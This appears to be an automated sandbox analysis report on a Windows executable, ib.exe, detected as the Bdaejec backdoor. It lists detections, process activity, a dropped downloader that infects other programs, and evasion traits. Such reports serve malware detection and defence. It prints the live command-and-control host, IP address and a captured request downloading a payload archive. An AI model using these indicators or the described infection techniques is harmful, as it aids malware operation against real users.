Edit tour

Windows Analysis Report
ib.exe

Overview

General Information

Sample name:	ib.exe
Analysis ID:	1542812
MD5:	1913f1b56f94a777c0130ef6e358586f
SHA1:	b1bc6735532a06744d37245f172408f8c2f062b0
SHA256:	79757b669da7754fb0319e313a1c24b9c9e170b7815174ca55959eb3bbca43f3
Tags:	BackdoorBDAEJECexeuser-osuchdayu
Infos:

Detection

Bdaejec

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Bdaejec

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject threads in other processes

Found API chain indicative of sandbox detection

Found stalling execution ending in API Sleep call

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

IP address seen in connection with other malware

Installs a global mouse hook

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

System is w10x64

ib.exe (PID: 6876 cmdline: "C:\Users\user\Desktop\ib.exe" MD5: 1913F1B56F94A777C0130EF6E358586F)

conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

hjErac.exe (PID: 6996 cmdline: C:\Users\user\AppData\Local\Temp\hjErac.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)

WerFault.exe (PID: 5816 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: hjErac.exe PID: 6996	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security

Suricata Signatures

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T13:52:04.339917+0200	2807908	1	Malware Command and Control Activity Detected	192.168.2.4	49730	44.221.84.105	799	TCP

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T13:52:03.656735+0200	2838522	1	Malware Command and Control Activity Detected	192.168.2.4	59334	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ib.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

ReversingLabs: Detection: 97%

Multi AV Scanner detection for submitted file

Source: ib.exe

ReversingLabs: Detection: 94%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for dropped file

Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ib.exe

Joe Sandbox ML: detected

Source: ib.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ib.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

2_2_00CB29E2

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00CB2B8C

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.4:59334 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.4:49730 -> 44.221.84.105:799

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic

HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\ib.exe

Code function: 0_2_003E2130 Sleep,WSAStartup,WSAGetLastError,socket,WSAGetLastError,htons,inet_addr,setsockopt,sendto,sendto,WSAGetLastError,recvfrom,WSAGetLastError,sendto,WSAGetLastError,exit,

0_2_003E2130

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: hjErac.exe, 00000002.00000003.1687849172.0000000000830000.00000004.00001000.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net/cH
Source: hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGsf
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarGv
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarR
Source: hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarg
Source: hjErac.exe, 00000002.00000002.1888921546.0000000000DBA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq
Source: Amcache.hve.2.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.2.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: hjErac.exe, 00000002.00000002.1888644976.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697687112.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.2.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Source: C:\Users\user\Desktop\ib.exe

Windows user hook set: 0 mouse low level NULL

Jump to behavior

Source: SciTE.exe.2.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_668a944f-e

System Summary

PE file contains section with special chars

Source: MyProg.exe.2.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: hjErac.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\ib.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003ECB71		0_2_003ECB71
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB6D00		2_2_00CB6D00

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\hjErac.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428

Source: MyProg.exe.2.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: ib.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: hjErac.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: hjErac.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: hjErac.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@6/11@1/2

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Code function: 2_2_00CB119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

2_2_00CB119F

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Users\user\Desktop\ib.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\$InputBridge$
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6996

Source: C:\Users\user\Desktop\ib.exe

File created: C:\Users\user\AppData\Local\Temp\hjErac.exe

Jump to behavior

Source: C:\Users\user\Desktop\ib.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ib.exe

ReversingLabs: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\ib.exe "C:\Users\user\Desktop\ib.exe"
Source: C:\Users\user\Desktop\ib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ib.exe	Process created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6996 -s 1428
Source: C:\Users\user\Desktop\ib.exe	Process created: C:\Users\user\AppData\Local\Temp\hjErac.exe C:\Users\user\AppData\Local\Temp\hjErac.exe	Jump to behavior

Source: C:\Users\user\Desktop\ib.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ib.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ib.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: ib.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: ib.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb55 source: ib.exe
Source:	Binary string: F:\Projects\Android\InputBridgeWindows\Release\InputBridge.pdb source: ib.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ib.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe

Unpacked PE file: 2.2.hjErac.exe.cb0000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: Hu

Source: ib.exe	Static PE information: section name: Hu
Source: hjErac.exe.0.dr	Static PE information: section name: .aspack
Source: hjErac.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.2.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003EBE7B push ebp; ret	0_2_003EBE7E
Source: C:\Users\user\Desktop\ib.exe	Code function: 0_2_003EBE85 push 00000000h; ret	0_2_003EC296
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB1638 push dword ptr [00CB3084h]; ret	2_2_00CB170E
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB600A push ebp; ret	2_2_00CB600D
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB2D9B push ecx; ret	2_2_00CB2DAB
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	Code function: 2_2_00CB6014 push 00CB14E1h; ret	2_2_00CB6425

Source: ib.exe	Static PE information: section name: Hu entropy: 6.93404046385773
Source: hjErac.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.934379842605089
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.93494119851436
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.933703573716871

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\Desktop\ib.exe	File created: C:\Users\user\AppData\Local\Temp\hjErac.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49730 -> 799

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
